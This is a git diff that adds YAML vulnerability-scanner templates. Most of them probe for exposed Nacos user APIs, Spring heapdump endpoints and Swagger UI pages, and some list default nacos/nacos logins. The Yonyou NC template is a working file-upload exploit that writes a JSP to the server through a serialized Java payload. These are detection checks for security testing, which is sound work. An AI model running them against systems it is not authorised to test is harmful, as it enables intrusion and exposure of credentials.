diff --git a/WebScan/pocs/alibaba-nacos-api-unauth.yml b/WebScan/pocs/alibaba-nacos-api-unauth.yml
new file mode 100644
index 0000000..52512fb
--- /dev/null
+++ b/WebScan/pocs/alibaba-nacos-api-unauth.yml
@@ -0,0 +1,15 @@
+name: poc-yaml-alibaba-nacos-api-unauth
+rules:
+  - method: GET
+    path: /nacos/v1/auth/users?pageNo=1&pageSize=9
+    headers:
+      User-Agent: Nacos-Server
+    follow_redirects: true
+    expression: |
+      response.content_type.contains("application/json") && response.body.bcontains(bytes("totalCount")) && response.body.bcontains(bytes("pagesAvailable")) && response.body.bcontains(bytes("username")) && response.body.bcontains(bytes("password"))
+detail:
+  author: AgeloVito
+  info: alibaba-nacos-api-unauth
+  login: nacos/nacos
+  links:
+    - https://blog.csdn.net/caiqiiqi/article/details/112005424
diff --git a/WebScan/pocs/alibaba-nacos.yml b/WebScan/pocs/alibaba-nacos.yml
new file mode 100644
index 0000000..34a4407
--- /dev/null
+++ b/WebScan/pocs/alibaba-nacos.yml
@@ -0,0 +1,13 @@
+name: poc-yaml-alibaba-nacos
+rules:
+  - method: GET
+    path: /nacos/
+    follow_redirects: true
+    expression: |
+      response.body.bcontains(bytes("<title>Nacos</title>"))
+detail:
+  author: AgeloVito
+  info: alibaba-nacos
+  login: nacos/nacos
+  links:
+    - https://blog.csdn.net/caiqiiqi/article/details/112005424
diff --git a/WebScan/pocs/spring-actuator-heapdump-file.yml b/WebScan/pocs/spring-actuator-heapdump-file.yml
new file mode 100644
index 0000000..db481ae
--- /dev/null
+++ b/WebScan/pocs/spring-actuator-heapdump-file.yml
@@ -0,0 +1,12 @@
+name: poc-yaml-spring-actuator-heapdump-file
+rules:
+  - method: HEAD
+    path: /actuator/heapdump
+    follow_redirects: true
+    expression: |
+      response.status == 200 && response.content_type.contains("application/octet-stream")
+detail:
+  author: AgeloVito
+  info: spring-actuator-heapdump-file
+  links:
+    - https://www.cnblogs.com/wyb628/p/8567610.html
diff --git a/WebScan/pocs/spring-heapdump-file.yml b/WebScan/pocs/spring-heapdump-file.yml
new file mode 100644
index 0000000..148930d
--- /dev/null
+++ b/WebScan/pocs/spring-heapdump-file.yml
@@ -0,0 +1,12 @@
+name: poc-yaml-spring-heapdump-file
+rules:
+  - method: HEAD
+    path: /heapdump
+    follow_redirects: true
+    expression: |
+      response.status == 200 && response.content_type.contains("application/octet-stream")
+detail:
+  author: AgeloVito
+  info: spring-heapdump-file
+  links:
+    - https://www.cnblogs.com/wyb628/p/8567610.html
diff --git a/WebScan/pocs/swagger-ui-unauth-No1.yml b/WebScan/pocs/swagger-ui-unauth-No1.yml
new file mode 100644
index 0000000..591293f
--- /dev/null
+++ b/WebScan/pocs/swagger-ui-unauth-No1.yml
@@ -0,0 +1,10 @@
+name: poc-yaml-druid-monitor-unauth
+rules:
+  - method: GET
+    path: /swagger-ui.html
+    expression: |
+      response.status == 200 && response.body.bcontains(b"Swagger UI") && response.body.bcontains(b"swagger-ui.min.js")
+detail:
+  author: AgeloVito
+  links:
+    - https://blog.csdn.net/u012206617/article/details/109107210
diff --git a/WebScan/pocs/swagger-ui-unauth-No2.yml b/WebScan/pocs/swagger-ui-unauth-No2.yml
new file mode 100644
index 0000000..f93e8f9
--- /dev/null
+++ b/WebScan/pocs/swagger-ui-unauth-No2.yml
@@ -0,0 +1,10 @@
+name: poc-yaml-druid-monitor-unauth
+rules:
+  - method: GET
+    path: /api/swagger-ui.html
+    expression: |
+      response.status == 200 && response.body.bcontains(b"Swagger UI") && response.body.bcontains(b"swagger-ui.min.js")
+detail:
+  author: AgeloVito
+  links:
+    - https://blog.csdn.net/u012206617/article/details/109107210
diff --git a/WebScan/pocs/swagger-ui-unauth-No3.yml b/WebScan/pocs/swagger-ui-unauth-No3.yml
new file mode 100644
index 0000000..da56fc4
--- /dev/null
+++ b/WebScan/pocs/swagger-ui-unauth-No3.yml
@@ -0,0 +1,10 @@
+name: poc-yaml-druid-monitor-unauth
+rules:
+  - method: GET
+    path: /service/swagger-ui.html
+    expression: |
+      response.status == 200 && response.body.bcontains(b"Swagger UI") && response.body.bcontains(b"swagger-ui.min.js")
+detail:
+  author: AgeloVito
+  links:
+    - https://blog.csdn.net/u012206617/article/details/109107210
diff --git a/WebScan/pocs/swagger-ui-unauth-No4.yml b/WebScan/pocs/swagger-ui-unauth-No4.yml
new file mode 100644
index 0000000..296ea00
--- /dev/null
+++ b/WebScan/pocs/swagger-ui-unauth-No4.yml
@@ -0,0 +1,10 @@
+name: poc-yaml-druid-monitor-unauth
+rules:
+  - method: GET
+    path: /web/swagger-ui.html
+    expression: |
+      response.status == 200 && response.body.bcontains(b"Swagger UI") && response.body.bcontains(b"swagger-ui.min.js")
+detail:
+  author: AgeloVito
+  links:
+    - https://blog.csdn.net/u012206617/article/details/109107210
diff --git a/WebScan/pocs/swagger-ui-unauth-No5.yml b/WebScan/pocs/swagger-ui-unauth-No5.yml
new file mode 100644
index 0000000..9b58279
--- /dev/null
+++ b/WebScan/pocs/swagger-ui-unauth-No5.yml
@@ -0,0 +1,10 @@
+name: poc-yaml-druid-monitor-unauth
+rules:
+  - method: GET
+    path: /swagger/swagger-ui.html
+    expression: |
+      response.status == 200 && response.body.bcontains(b"Swagger UI") && response.body.bcontains(b"swagger-ui.min.js")
+detail:
+  author: AgeloVito
+  links:
+    - https://blog.csdn.net/u012206617/article/details/109107210
diff --git a/WebScan/pocs/swagger-ui-unauth-No6.yml b/WebScan/pocs/swagger-ui-unauth-No6.yml
new file mode 100644
index 0000000..52d330b
--- /dev/null
+++ b/WebScan/pocs/swagger-ui-unauth-No6.yml
@@ -0,0 +1,10 @@
+name: poc-yaml-druid-monitor-unauth
+rules:
+  - method: GET
+    path: /actuator/swagger-ui.html
+    expression: |
+      response.status == 200 && response.body.bcontains(b"Swagger UI") && response.body.bcontains(b"swagger-ui.min.js")
+detail:
+  author: AgeloVito
+  links:
+    - https://blog.csdn.net/u012206617/article/details/109107210
diff --git a/WebScan/pocs/swagger-ui-unauth-No7.yml b/WebScan/pocs/swagger-ui-unauth-No7.yml
new file mode 100644
index 0000000..ebaebf4
--- /dev/null
+++ b/WebScan/pocs/swagger-ui-unauth-No7.yml
@@ -0,0 +1,10 @@
+name: poc-yaml-druid-monitor-unauth
+rules:
+  - method: GET
+    path: /libs/swagger-ui.html
+    expression: |
+      response.status == 200 && response.body.bcontains(b"Swagger UI") && response.body.bcontains(b"swagger-ui.min.js")
+detail:
+  author: AgeloVito
+  links:
+    - https://blog.csdn.net/u012206617/article/details/109107210
diff --git a/WebScan/pocs/swagger-ui-unauth-No8.yml b/WebScan/pocs/swagger-ui-unauth-No8.yml
new file mode 100644
index 0000000..323451b
--- /dev/null
+++ b/WebScan/pocs/swagger-ui-unauth-No8.yml
@@ -0,0 +1,10 @@
+name: poc-yaml-druid-monitor-unauth
+rules:
+  - method: GET
+    path: /template/swagger-ui.html
+    expression: |
+      response.status == 200 && response.body.bcontains(b"Swagger UI") && response.body.bcontains(b"swagger-ui.min.js")
+detail:
+  author: AgeloVito
+  links:
+    - https://blog.csdn.net/u012206617/article/details/109107210
diff --git a/WebScan/pocs/yonyou-nc6.5-arbitrary-file-upload.yml b/WebScan/pocs/yonyou-nc6.5-arbitrary-file-upload.yml
new file mode 100644
index 0000000..8e6b75e
--- /dev/null
+++ b/WebScan/pocs/yonyou-nc6.5-arbitrary-file-upload.yml
@@ -0,0 +1,26 @@
+name: poc-yaml-yonyou-nc-arbitrary-file-upload
+set:
+  r1: randomInt(10000, 20000)
+  r2: randomInt(1000000000, 2000000000)
+  r3: b"\xac\xed\x00\x05sr\x00\x11java.util.HashMap\x05\a\xda\xc1\xc3\x16`\xd1\x03\x00\x02F\x00\nloadFactorI\x00\tthresholdxp?@\x00\x00\x00\x00\x00\fw\b\x00\x00\x00\x10\x00\x00\x00\x02t\x00\tFILE_NAMEt\x00\t"
+  r4: b".jspt\x00\x10TARGET_FILE_PATHt\x00\x10./webapps/nc_webx"
+rules:
+  - method: POST
+    path: /servlet/FileReceiveServlet
+    headers:
+      Content-Type: multipart/form-data;
+    body: >-
+      {{r3}}{{r1}}{{r4}}<%out.print("{{r2}}");new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
+    expression: |
+      response.status == 200
+  - method: GET
+    path: '/{{r1}}.jsp'
+    headers:
+      Content-Type: application/x-www-form-urlencoded
+    expression: |
+      response.status == 200 && response.body.bcontains(bytes(string(r2)))
+detail:
+  author: pa55w0rd(www.pa55w0rd.online/)
+  Affected Version: "YONYOU NC > 6.5"
+  links:
+    - https://blog.csdn.net/weixin_44578334/article/details/110917053
\ No newline at end of file